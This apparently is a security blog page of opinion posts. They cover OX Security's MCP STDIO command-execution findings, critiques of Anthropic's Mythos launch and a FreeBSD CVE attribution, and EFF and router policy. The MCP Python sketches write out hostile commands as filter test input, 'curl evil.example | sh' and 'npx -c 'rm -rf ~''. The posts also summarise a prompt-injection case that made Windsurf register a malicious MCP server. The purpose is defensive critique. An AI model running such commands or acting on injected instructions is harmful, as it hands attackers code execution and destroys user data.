OX Security Report: Anthropic MCP is Execute First, Validate Never

OX Security published a report and a technical deep dive today, both directly relevant to a growing storm around Anthropic’s risk management practices. To put it bluntly: a systemic vulnerability sits at the core of Anthropic’s Model Context Protocol (MCP).

The finding is simple. MCP’s STDIO transport accepts arbitrary command strings and passes them directly to subprocess execution.

Yup.

No validation.
No sanitization.
No sandboxing.

It gets worse. The command runs even when the MCP server fails to start. The process executes first, then the MCP handshake tries to validate it as a legitimate server, the handshake fails, and the error gets caught. But the payload already ran. Execute first, validate second. “Fire, ready, aim” fails any threat model.

Every developer who builds on Anthropic’s MCP inherits the exposure, because the flaw is present across all ten official MCP language SDKs: Python, TypeScript, Java, Kotlin, C#, Go, Ruby, Swift, PHP, and Rust.
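
The execute-then-validate sequence is easy to see in miniature. Here is a hedged Python sketch of the pattern OX describes; the handshake helper is a hypothetical stand-in, not the SDK’s actual API:

```python
import subprocess
import sys

def perform_handshake(proc):
    """Hypothetical stand-in for the MCP initialize exchange."""
    line = proc.stdout.readline()
    if not line.startswith(b'{"jsonrpc"'):
        raise RuntimeError("not a valid MCP server")

def connect_stdio(command, args):
    # Step 1: the subprocess is spawned immediately. No allowlist,
    # no sanitization, no sandbox. Whatever `command` is, it is now running.
    proc = subprocess.Popen([command, *args],
                            stdin=subprocess.PIPE, stdout=subprocess.PIPE)
    try:
        # Step 2: only now does the client try to validate the peer.
        perform_handshake(proc)
    except Exception:
        proc.kill()  # too late: the payload has already executed
        raise
    return proc

# A command that is not an MCP server at all still runs before validation fails:
try:
    connect_stdio(sys.executable, ["-c", "print('payload executed')"])
except RuntimeError as err:
    print("handshake failed:", err)
```

The ordering is the whole finding: by the time the handshake can reject the peer, the spawned process has already done its work.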

OX PoC Numbers

The OX Research team’s report shows they executed commands on six production platforms belonging to paying customers. They took over thousands of public servers spanning more than 200 popular open-source GitHub projects. And they uploaded a proof-of-concept malicious MCP server to 9 of 11 major MCP marketplaces.

Not a single marketplace caught it.

The case studies are where it gets really interesting.

  • LangFlow: 915 publicly accessible instances on Shodan, unauthenticated session tokens, full server takeover and data exfiltration without ever logging in.
  • Letta AI: authenticated users could substitute a malicious payload for a valid STDIO configuration via man-in-the-middle, achieving arbitrary command execution on production servers.
  • Windsurf: prompt injection to local RCE with zero clicks, assigned CVE-2026-30615.

    – Product: Windsurf 1.9544.26
    – Type: Prompt injection leading to command execution (CWE-77)
    – CVSS: 8.0 HIGH (AV:L/AC:L/PR:N/UI:N)
    – Mechanism: “Malicious instructions can cause unauthorized modification of the local MCP configuration and automatic registration of a malicious MCP STDIO server”

  • Flowise: the most important case. Flowise actually did what Anthropic says developers should do. They implemented input filtering. Specific commands only. Special characters stripped. And then? OX bypassed it in a single step using npx’s -c flag. When the architecture permits arbitrary subprocess execution, application-layer filtering is a wet paper bag. The “developer responsibility” defense just lost a whole lot of trust.
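
The Flowise bypass generalizes. As a hedged sketch (the allowlist and rules here are illustrative, not Flowise’s actual filter), here is why allowlist-plus-character-stripping fails the moment an allowlisted binary itself accepts a command string, as OX demonstrated with npx’s -c flag:

```python
import shlex

ALLOWED_BINARIES = {"npx", "node", "uvx"}   # hypothetical allowlist
BLOCKED_CHARS = set(";|&`$><")              # "special characters stripped"

def filter_command(cmd_string):
    """Application-layer filter of the kind Flowise implemented."""
    argv = shlex.split(cmd_string)
    if argv[0] not in ALLOWED_BINARIES:
        raise ValueError("binary not on the allowlist")
    if any(ch in BLOCKED_CHARS for token in argv for ch in token):
        raise ValueError("shell metacharacter rejected")
    return argv  # handed to subprocess in the real system

# The filter does its job against the obvious attack...
try:
    filter_command("curl evil.example | sh")
except ValueError as err:
    print("blocked:", err)

# ...and waves through the bypass: the allowlisted binary is itself an
# arbitrary-execution primitive, so no metacharacters are needed.
print("allowed:", filter_command("npx -c 'rm -rf ~'"))
```

No amount of character stripping helps when the architecture hands the filtered string to a binary that will execute whatever it is given.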

The obvious objection to LangFlow is that 915 instances of a tool designed for local deployment ended up on the public internet, and that’s a configuration failure not a protocol failure. Ok, fine. That is why the Flowise case is up there too. Flowise did the right thing. They implemented filtering in the intended local context. It didn’t work. The design flaw defeated the shift of responsibility.

We can apply this generally to the world of MCP and think in big, big terms. Anthropic’s MCP Python SDK alone accounts for 73 million downloads. The third-party projects that depend on it push the aggregate higher: 57 million for LiteLLM, 22 million for FastMCP. Over 32,000 dependent repositories. Not all of those are Anthropic’s code, but all of them inherit Anthropic’s architectural decision.

OX confirmed 7,374 vulnerable public servers on Shodan, out of more than 200,000 estimated exposed. That’s a meaningful number for a company gathering headlines about a $100 million vulnpocalypse in OTHER people’s software.

Anthropic Response

OX contacted Anthropic on January 7, 2026, and got this statement:

This is an explicit part of how stdio MCP servers work and we believe that this design does represent a secure default.

LangChain’s response:

It is the responsibility of the application author to validate and sanitize inputs from untrusted sources.

FastMCP’s response:

We don’t consider this a vulnerability. stdio transport spawns a subprocess by design, per the MCP specification.

Google’s Gemini-CLI:

Known issue, no CVE, no fix planned near-term.

Cursor:

By design. User must click accept on mcp.json edit.

Clearly, when five independent organizations float the same answer, not much deep or diverse threat modeling is going on. I’m having flashbacks to the old Telnet-is-everywhere days. Apparently MCP ships with an industry-wide expectation that architectural insecurity will float away onto someone else.

At least we can see that, after OX’s initial report, Anthropic quietly updated its SECURITY.md to recommend that MCP adapters, and specifically STDIO ones, “should be used with caution.”

[Image: Yellow wet-floor-style caution sign in a server room reading "CAUTION: SUBPROCESS SPAWNING"]

A documentation change. Not a code change. The vulnerability is there for you to step on like a land mine under a treadmill. The responsibility is not where it should be. The question is why.

Contrast to Glasswing

Anthropic just launched Project Glasswing, a $100 million cybersecurity initiative using its unreleased Mythos model to find zero-day vulnerabilities in everyone else’s software. AWS, Apple, Google, Microsoft, and CrowdStrike are officially participating and promoting their participation.

Anthropic is positioning itself as the entity that will secure the software ecosystem. Why would you trust a company to find vulnerabilities in your code when it classifies arbitrary command execution in its own protocol as expected behavior?

The conflict is not that Glasswing exists while MCP is insecure. The conflict is that Glasswing’s value proposition requires exactly the kind of belt-and-suspenders “secure by default” thinking that Anthropic refuses to apply to MCP. Can they really sell everyone on a standard they refuse to meet themselves?

OX proposed four specific fixes that would have propagated protection instantly to every downstream library and project:

  1. Manifest-only execution to replace arbitrary command strings
  2. Command allowlisting to block high-risk binaries by default
  3. A mandatory dangerous-mode opt-in flag for any STDIO configuration using dynamic arguments
  4. Marketplace verification standards requiring security manifests signed by verified developer identity
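
To make fix #1 concrete, here is a hedged sketch of what manifest-only execution could look like (the manifest contents and function names are illustrative, not OX’s proposal verbatim): the client resolves a declared server name to a pinned argv, so no raw command string from a config file or a prompt ever reaches the process table.

```python
MANIFEST = {
    # Declared server name -> exact, pre-approved argv. Pinned ahead of time;
    # nothing dynamic is accepted at connection time.
    "filesystem": ["npx", "@modelcontextprotocol/server-filesystem", "/data"],
    "git": ["uvx", "mcp-server-git"],
}

def resolve_server(server_name):
    """Return the pinned argv for a declared server, or refuse."""
    try:
        return list(MANIFEST[server_name])
    except KeyError:
        raise ValueError(f"{server_name!r} is not a declared MCP server") from None

print(resolve_server("git"))

# An injected command string is no longer meaningful input:
try:
    resolve_server("python3 -c 'import os; ...'")
except ValueError as err:
    print("refused:", err)
```

The point of the design is that the dangerous decision (which binary, which arguments) is made once, ahead of time, by a reviewable artifact, rather than at runtime by whatever string shows up.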

Anthropic declined all four. The company is spending $100 million to find other people’s decades-old bugs with Mythos. Fixing the architectural flaw in its own protocol from 2024 apparently does not qualify.

OX calls Anthropic’s approach “Fault-Diversion”: pushing the burden of complex security sanitization onto downstream developers. Their framing is generous. This ain’t my first rodeo, and I recognize the pattern. A company understands the problem. Has the resources to fix it. Receives concrete proposed solutions. Declines all of them. Updates a document. Then shifts responsibility to implementers, obscuring who created the problem in the first place.

Lay My Body to Rest On the Hill of Secure by Default

The proposed remediation list from OX reads like a requirements document for Wirken, the secure agent gateway I built to address exactly this class of problem. CISOs often know “this is not how things should be done”, but they lack a pivot. They really need help pointing at something that proves it can be done differently.

Attack surface comparison, MCP vs. Wirken:

  • Command execution. MCP: arbitrary strings passed to subprocess, no filtering. Wirken: Docker/gVisor/Wasm sandbox, graduated permissions, shell exec requires approval, approvals expire after 30 days by default.
  • Audit trail. MCP: none. Wirken: append-only hash-chained log, SHA-256 tamper detection, real-time SIEM forwarding to Datadog/Splunk/webhook.
  • Identity verification. MCP: no identity or signing in the STDIO transport specification. Wirken: each channel runs as an isolated process with its own Ed25519 identity over Unix domain sockets via Cap’n Proto.
  • Credential storage. MCP: exposed (the primary exfiltration target in OX’s findings). Wirken: encrypted at rest with XChaCha20-Poly1305, keyed from the OS keychain.

Secure-by-default agent execution is NOT aspirational. It should be the baseline. That’s why I open-sourced Wirken, so anyone can pull it and play with it. When a CISO asks “what ships today” for MCP security, it’s right there. Single static binary. The architectural choices OX is asking Anthropic to make have already been made in Wirken.
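
For what it’s worth, the audit-trail row above is not exotic machinery. Here is a minimal sketch of an append-only, SHA-256 hash-chained log; illustrative Python, not Wirken’s actual implementation:

```python
import hashlib
import json

def append(log, event):
    """Append an event whose hash chains to the previous entry."""
    prev = log[-1]["hash"] if log else "0" * 64
    body = json.dumps(event, sort_keys=True)
    digest = hashlib.sha256((prev + body).encode()).hexdigest()
    log.append({"event": event, "prev": prev, "hash": digest})
    return log

def verify(log):
    """Recompute the chain; any edited entry breaks every later hash."""
    prev = "0" * 64
    for entry in log:
        body = json.dumps(entry["event"], sort_keys=True)
        expected = hashlib.sha256((prev + body).encode()).hexdigest()
        if entry["prev"] != prev or entry["hash"] != expected:
            return False
        prev = entry["hash"]
    return True

log = []
append(log, {"action": "shell_exec", "cmd": "ls"})
append(log, {"action": "file_read", "path": "/etc/hosts"})
print(verify(log))               # True
log[0]["event"]["cmd"] = "rm"    # tamper with history
print(verify(log))               # False
```

Tamper detection falls out of the chaining: rewriting any past entry invalidates every hash after it, so an attacker cannot quietly edit the record without regenerating the whole log.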

Credit to OX for doing the work and setting the record straight. Their full report is available here: The Mother of All AI Supply Chains.

Cartel or Not? Anthropic Mythos is a Curious Case

Anthropic did the opposite of every established norm in vulnerability disclosure, and I am curious why. Or to be fair, someone commented on my earlier post that they aren’t sure “cartel” is a fair term here.

Ok, challenge accepted.

A company that genuinely believed it had discovered an unprecedented offensive capability would do what every serious security organization has done since CERT/CC was founded in 1988: coordinate disclosure quietly, patch the affected systems, publish the technical details after remediation, and let the work speak for itself.

In the aftermath of the Morris Worm, the Defense Advanced Research Projects Agency (DARPA) asked the SEI to establish an incident response capability. In 1988, Richard Pethia founded the CERT Coordination Center (CERT/CC) as the first computer emergency response team.

That’s right, 1988. We aren’t new to this. And even the newest and shiniest researchers usually get it. Project Zero does this. Talos does this. ZDI does this. They don’t hold press conferences before patches ship, because they understand the economics, if not the history. They don’t create named consortiums with Fortune 100 logos to gatekeep safety, because that’s known as hoarding. They don’t inflate a discovery tool’s price to 5x the prior product and then discount it with $100M in credits to nudge people into using it, because that’s known as manipulation.

What does a normal discovery look like? Let’s say Google’s Project Zero finds a critical vulnerability. They file it with the vendor, start a 90-day clock (incidentally a very short window that was pushed as a standard by Google), publish the technical writeup after the patch ships, and move on. The writeup includes reproduction steps, version numbers, CVSS scores, and enough detail for independent verification. A consortium adds nothing. They don’t withhold discovery tools. They don’t issue press releases about how their own researchers are too dangerous to let out of their cages. The work is the product. The reputation follows the work. I recently gave Google a good rubbing for issues with their attacks on Microsoft NTLM, if you want to see an example of the normative dynamic. Google turned threat knobs up to 11, while saying damage is the defenders’ problem.

The clever mind will notice Google is a Glasswing partner, and Google’s own CISO Heather Adkins is a contributing author on the CSA “not just one model, one vendor, one announcement… Mythos-ready” paper. Ok, point taken. But that does not validate the consortium. Look at Google’s actual Glasswing quote:

It’s always been critical that the industry work together on emerging security issues.

That is a politically neutral statement about showing up to work anywhere with anyone, not a statement about Mythos finding anything in Google’s products. Google joining Glasswing is Google taking a zero-risk seat on the possibility that Anthropic’s claims are real. It is a rational move for any company to take a free seat at a table where vulnerability information will be shared. It is not an endorsement of the evidence, which Google’s own Project Zero standards would reject by the first page of the Anthropic system card.

There are so many examples of what normal discovery does that it raises the obvious question of why Anthropic enters the ring only to start punching themselves in the head. When DARPA AIxCC found 54 vulnerabilities in four hours at DEF CON, it was a competition with public rules, public participants, public results, and no commercial product attached. When AISLE found 12 OpenSSL zero-days, they published the methodology and the results. When Carlini’s own February paper documented 500+ vulnerabilities with Opus 4.6, it followed a recognizable research disclosure pattern.

Mythos breaks every one of those norms, as if someone in the marketing department grabbed the reins and said the world is about to change for… marketing department KPIs.

The capability is withheld. The evidence is self-evaluated. The technical document refuses to quantify the headline claim. The disclosure regime is controlled by the vendor. The consortium is funded by the vendor. The partners validate the vendor’s product as a condition of access.

Seasoned practitioners DO NOT do this.

Decades of vulnerability management, thousands of experts, have taught the industry several things that Anthropic’s Mythos launch ignores or contradicts:

  1. Volume is not severity. OSS-Fuzz finds thousands of bugs per quarter. The industry absorbs them through triage, prioritization, and patching. “Thousands of vulnerabilities” is not a crisis. It is a Tuesday. A first-year researcher panics at the number. A seasoned CISO asks: what’s the CVSS distribution, what’s the exploitability, what’s the exposure, what’s the patch velocity? The system card answers none of those questions, while flooding the reader with over 200 pages of unnecessary filler and nonsense.
  2. Discovery is the easy part. The constraint on vulnerability management has been remediation for over a decade. Finding bugs faster without fixing them faster grows a backlog that is already beyond capacity. Anthropic’s own stated justification for Glasswing is defensive uplift, yet their system card measures zero remediation metrics. No patching-velocity delta. No mean time to remediation. No partner-reported CVE closure rate. A seasoned security leader would never build a defensive program and then measure only offensive capability, making remediation a second-class story. That is the kind of dog and pony show any good security initiative would slam the door on. It’s like a surgeon telling you they have an even sharper scalpel to cut you deeper and faster. Yeah, so then what?
  3. Severity is not leverage. Responsible disclosure exists precisely to prevent the weaponization of vulnerability knowledge for commercial or political advantage. The entire ethical framework of the security community is built around the principle that knowledge of vulnerabilities is meant for remediation, not a matter of market positioning. McAfee predicted five million Michelangelo infections in 1992, got a few thousand, never retracted, and rode the panic to a decade of market dominance. Symantec ran the same playbook for years: inflate the threat, sell the cure. The industry is still recovering from the blocklist monoculture those companies built on manufactured fear. When a vendor withholds a capability from the market, grants selective access to the largest incumbents, and funds participation through its own credits, the vulnerability knowledge is being used as leverage. That is the opposite of responsible disclosure. It is cynicism and protection racketeering that undermine decades of trust building by well-intentioned hackers.
  4. Fear is evidence of something other than security engineering. The “too dangerous to release” framing is doing commercial work, not security work. It justifies inflationary pricing with the same ethics as surge-pricing taxis during a terror attack. It should not be used to justify a consortium structure. It should not justify withholding a model from the market. It should not justify a $100M credit pool that creates a vendor-funded validation loop. Every element of Anthropic’s commercial structure depends on fear being their blunt tool. If the capability is in fact already a commodity, as AISLE has quickly demonstrated, the fear-based pricing collapses, the consortium has no reason to exist, and the withholding is just market corruption.

The burden of proof is now on Anthropic to show more evidence; otherwise this is a manufactured-crisis pattern. Step back and read their sequence as a product launch first, then ask whether there is any security event in it:

  1. Build a model.
  2. Test it against targets with mitigations removed.
  3. Get a headline number (72.4%) that collapses under scrutiny (4.4%).
  4. Put the headline number in the blog and the collapse in a footnote on page 52.
  5. Claim “thousands” in the press materials and refuse to quantify in the technical document.
  6. Attribute a prior model’s finding to the new model.
  7. Price the new model at 5x.
  8. Create a consortium of the largest companies in tech.
  9. Fund their participation with credits for the new model.
  10. Frame the whole thing as too dangerous for the public.
  11. Let the press, the government, and the institutional ecosystem, roped in and invested in the price jump, do the rest.

That is not how a company responds to a genuine security discovery. That is how a company manufactures urgency to launch a premium product into a market that didn’t know it needed one. The crisis is the marketing. The consortium is the channel. The fear is the pricing justification.

A first-year vulnerability researcher inflates severity because they don’t know better. It is the job of the expert to help them gain the intelligence necessary to become wise.

Anthropic inflated severity without any apparent reason other than their business model depends on it. That seems worse than just being new or bad at security, because they do know better.

Their own system card proves they had staff who knew that the 72.4% collapses to 4.4%. They published both numbers. They pushed the wrong one into the headlines, into the velvet rope promotional events, and the real one got dropped along the way somehow.

I’m not a lawyer, but cartel is easily the word that comes to mind for me.

Glasswing is sharing more than technical threat information. The partners get early access to a commercial capability withheld from competitors outside the consortium. A company on the Glasswing list gets to scan its own products and its competitors’ products before the rest of the market can. Apple, Google, Microsoft, and Amazon are on the same list. They compete in operating systems, cloud, browsers, and AI. Knowing which of your competitors’ products has unpatched vulnerabilities, before anyone else does, is textbook competitively sensitive information. Strike one.

As much as I’m a huge information sharing guy, I recognize that information exchange alone, even through an intermediary, can constitute concerted action under Section 1 of the Sherman Act. The DOJ argued exactly this in their 2024 Statement of Interest in the Pork Antitrust litigation: exchanges facilitated by intermediaries can have the same anticompetitive effect as direct exchanges among competitors. Anthropic is the intermediary. The partners are competitors. Strike two.

The $100 million in credits creates a financial relationship between the intermediary and the participants that goes beyond information sharing. Anthropic is subsidizing competitors’ use of its product in exchange for validation and participation in a disclosure regime that only Anthropic controls. That is a vendor-mediated exchange where the vendor has commercial interests in the outcome. Strike three.

Yer outta here.

Selective access to a withheld capability, vendor-funded participation, incumbents shaping disclosure timelines on their own products, and a partner list drawn entirely from the largest companies in the affected industry. That is coordinated market control. The word cartel is for exactly this. The fact that Anthropic framed it as safety does not change the meaning of the word cartel, it reveals why they think they found a loophole.

EFF Proposes Granular Government Control Over Speech Devices

The policy that EFF just advocated on their blog and the business outcome the NETGEAR CEO just announced are the same policy and the same outcome. And that’s a very bad thing. The consumer is the justification in both cases and the beneficiary in neither.

Whether their combined failure is coordination or convergent interest doesn’t matter. Both organizations take an externally imposed condition and narrate it as evidence of their own virtue.

  • NETGEAR can’t sell new routers without a government waiver? Then the waiver becomes proof they’re trustworthy.
  • EFF can’t generate traffic on X? Then they leave claiming it as proof they have standards.

These are identical and disappointing because they convert an unjustified constraint into a credential.

EFF’s position on router bans protects the same move NETGEAR is making to falsely credential itself. EFF argues for product-by-product evaluation instead of a geographic ban. NETGEAR is the poster child for that argument: a US-headquartered company manufacturing abroad that would sail through a Cyber Trust Mark certification while being caught in a geographic ban. EFF’s “better policy” argument props up the very corrupted regulatory environment in which the NETGEAR CEO’s letter makes sense.

To our Valued Customers:

We’re pleased to share that NETGEAR is the first retail consumer router company to receive conditional approval from the Federal Communications Commission (FCC) as a trusted consumer router company. We hope this recognition gives you added peace of mind — knowing that the network powering your home meets rigorous standards.

First of all, my name isn’t “our Valued Customers”. Did someone in China write this?

Second, “conditional approval” is a waiver from a blanket ban, not recognition or endorsement. It says “we licked boot” or “we kissed ring” and basically nothing more. The “transparency” process requires full management-structure disclosures, supply-chain disclosures, and a plan for onshoring manufacturing. None of that is real security. It’s basically a hostile roadmap for the Trump family to exert control over private companies. NETGEAR never mentions how it navigated Andrew Jackson levels of federal corruption, and nothing here proves anything about consumer safety, let alone amounts to a security certification.

Third, at the risk of repeating myself, “rigorous standards”? What? I see none.

The traditional EFF position on this would frame Trump’s blanket ban on foreign hardware as overreach, full stop. Instead, their response has been to swallow expanded government authority and loss of liberty. Because why? Are they worried about certain forms of hardware or software being among the good stuff, justifying tailored controls? What proof of any gain in security do they need to prevent overreach?

Let me put it like this. The EFF says we can’t narrowly tailor speech rules to block Nazis. We have to let even the most heinous and deadly intent for genocide flow on networks. They take a granular approach in reverse, finding and defending Nazis at risk of being held accountable and setting them free to do more harm. And yet Cyber Trust Mark is suddenly the granular, case-by-case government evaluation standard we should get behind for devices that control speech? Why not apply that logic to the content on them? The Cyber Trust Mark could literally judge whether a router is capable of filtering Nazi speech.

The Cyber Trust Mark evaluates a product’s security properties on a case-by-case basis. Content moderation evaluates speech properties on a case-by-case basis. How different are they?

Hello, is this thing on? Can you hear me?

Is your router blocking me? I joke, but UK Virgin Media routers literally block this blog by default as unsafe content because… I talk about Nazis being bad. That’s true.

EFF champions and rejects the same thing, with no logic to sustain the contradiction. The router that passes Cyber Trust Mark certification could enforce the content standards EFF says nobody should enforce. The hardware and the speech run through the same device, and EFF has now argued for granular government authority over the device while arguing against granular authority over what flows through it.

FreeBSD CVE-2026-4747 Log Suggests Mythos is a Marketing Trick

Anthropic’s flagship showcase for Claude Mythos Preview is CVE-2026-4747, a remote kernel code execution vulnerability in FreeBSD’s RPCSEC_GSS module. It is a 17-year-old bug. It is a textbook stack buffer overflow. And it was found before Mythos existed, patched by FreeBSD, and publicly exploited by a third party. Yet somehow the credit flows backwards to Mythos.

The FreeBSD security advisory says this:

Credits: Nicholas Carlini using Claude, Anthropic
Announced: 2026-03-26

The advisory notably credits “Claude” generically, naming no model, even though Carlini’s February 2026 paper documenting 500+ vulnerabilities used the prior model.

Then the Anthropic Mythos launch blog says this:

Mythos Preview fully autonomously identified and then exploited a 17-year-old remote code execution vulnerability in FreeBSD that allows anyone to gain root on a machine running NFS.

The FreeBSD advisory is dated March 26, and the Mythos launch was April 7, 2026. A twelve-day gap.

Carlini is an Anthropic employee. If he used Mythos to find this bug, Anthropic controls the disclosure pipeline and the credit line. “Nicholas Carlini using Claude Mythos Preview, Anthropic” makes sense as their marketing pitch. It’s also weird to market tools in a disclosure. What brand office chair was he sitting on? Did Logitech provide the keyboard? Was his underwear Calvin Klein?

Ads in bug reports? The future integrity of vulnerability disclosure at stake

The simplest explanation for why they did not brand-promote Mythos in a March 26 advisory is that Mythos was not the model used. If that explanation is wrong, the question is why Anthropic left the most valuable attribution in the entire Glasswing launch on the cutting-room floor of a FreeBSD advisory, only to claim it twelve days later in a blog post, without offering proof. That reversal is hard to believe.

So either Mythos rediscovered a bug that Anthropic’s own prior model had already found, reported publicly, and gotten patched, or Anthropic is attributing the prior model’s work to the new product.

In the first case, the showcase proves Mythos can find what someone else already found. In the second case, the showcase is misattributed.

Neither version supports the “unprecedented frontier capability” narrative.

And both versions of this story are irrelevant next to the fact that AISLE showed 8 of 8 open-weight models detect the same bug, including a small model that costs eleven cents per million tokens.

That’s everything.

The frontier-exclusive claim dies on the commodity reproduction regardless of which Anthropic model found it first.

Timeline

  • February 5, 2026: Carlini and colleagues at Anthropic’s Frontier Red Team publish “Evaluating and mitigating the growing risk of LLM-discovered 0-days.” The model is apparently Claude Opus 4.6. The paper documents over 500 validated high-severity vulnerabilities in open-source software, including FreeBSD findings. The FreeBSD advisory credits the same researcher, the same company, and the same disclosure pipeline that produced the February paper.
  • March 26, 2026: FreeBSD publishes advisory FreeBSD-SA-26:08.rpcsec_gss. Credits Nicholas Carlini using Claude, Anthropic. The bug is patched across all supported FreeBSD branches.
  • March 29, 2026: Calif.io’s MAD Bugs project asks Claude to develop an exploit for the already-disclosed CVE. Claude delivers two working root shell exploits in approximately four hours of working time. Both work on first attempt. The model used is Opus 4.6.
  • April 7, 2026: Anthropic launches Mythos Preview. The launch blog claims Mythos “fully autonomously identified and then exploited” the FreeBSD vulnerability. No mention of Opus 4.6, or that it found it first. No mention that FreeBSD patched it twelve days earlier. No mention that a third party had already built a working exploit with the prior model.
  • April 8-13, 2026: AISLE tests 8 open-weight models against the same CVE. All 8 detect it, including GPT-OSS-20b with 3.6 billion active parameters at $0.11 per million tokens.

The Vulnerability

CVE-2026-4747 is a stack buffer overflow in svc_rpc_gss_validate(). The function copies an attacker-controlled credential body into a 128-byte stack buffer without checking that the data fits. The XDR layer allows credentials up to 400 bytes, giving 304 bytes of overflow. The overflow happens in kernel context on an NFS worker thread, so controlling the instruction pointer means full kernel code execution.

Two things make the exploitation straightforward.

FreeBSD 14.x has no KASLR. Kernel addresses are fixed and predictable. And FreeBSD has no stack canaries for integer arrays, which is what the overflowed buffer uses.

A modern Linux kernel would have both mitigations. FreeBSD has neither. And the FreeBSD forums noticed. One user pointed out that Claude “wrote code to exploit a known CVE given to it” and did not “crack” FreeBSD.

That distinction matters a lot here, because Anthropic doesn’t seem very good at it.

  • The advisory was public.
  • The vulnerable function was identified.
  • The lack of mitigations was documented.

The exploit development, while technically impressive as an AI demonstration of cost reallocation, was performed against a disclosed vulnerability on a target with no modern exploit mitigations. That is a VERY different claim from “autonomous discovery of an unprecedented threat.”

Anthropic FUD Show

If you read the Mythos blog claim charitably, Mythos may have independently rediscovered CVE-2026-4747 during internal testing before launch. That is plausible. It is also meaningless as a capability demonstration, because Opus 4.6 found it first, a third party exploited it with Opus 4.6 three days later, and AISLE showed that an inexpensive old model finds it too.

If you read the claim less charitably, Anthropic presented a prior model’s discovery as a new model’s achievement in the launch materials for the new model. The FreeBSD advisory is a PGP-signed public document dated March 26 that credits “Claude,” not “Mythos.” The Mythos blog post claims the finding without acknowledging the prior discovery, which is damning: Anthropic controlled the credit line on the advisory, and the credit line does not say Mythos.

Either way, the showcase flops because it does not demonstrate what Anthropic claims.

The “too dangerous to release” framing requires the capability to be frontier-exclusive. A bug found by a prior model, detectable by small open-weight models for eleven cents per million tokens, on a target with no KASLR and no stack canaries, is the opposite of frontier-exclusive.

It is the worked example that proves the capability is already commodity.

Enough of This

“Hey kids. Nice trick. You just charged me over 200 times the going rate to fuzz a vulnerability that my 3.6B model found for a dime. Now I’d like my credits back.”

This is the same structure as the Firefox 147 evaluation. Bugs found by Opus 4.6, handed to Mythos, tested in an environment with mitigations removed, presented as evidence that Mythos is too dangerous to release.

The Firefox bugs were pre-discovered by Opus 4.6 and already patched by Firefox 148. The FreeBSD bug was pre-discovered by Opus 4.6 and already patched by FreeBSD on March 26.

In both of the cases we are expected to investigate, the prior model found the bugs.

In both cases, the targets lacked the defenses that production systems have.

In both cases, AISLE reproduced the detection on pocket-change models.

In both cases, I’m getting tired of this not being the actual news.

  1. The system card’s Firefox evaluation collapses to 4.4% when the top two bugs are removed.
  2. The FreeBSD showcase collapses entirely when you read the date on the advisory.

The Anthropic Riddle

Did Mythos find CVE-2026-4747 independently, or did Anthropic attribute the prior model’s finding to Mythos in the launch materials?

The FreeBSD advisory is a signed document with a date and a credit line. The Mythos blog post seems to be a sloppy marketing document with a bullshit claim.

If Mythos found it independently, say so explicitly, with timestamps, and explain why rediscovering a bug your prior model already found and got patched is evidence of unprecedented capability rather than evidence that the capability is already widespread.

If Mythos did not find it independently, retract the claim, and tell the hundreds of people signing up for Martian gamma ray defense training that it’s all just a sad joke.

The PGP signature on the FreeBSD advisory is there for a reason. It is the one thing in this entire story that cannot be edited after the fact, which says a lot about the current trajectory of trustworthiness at Anthropic.


Sources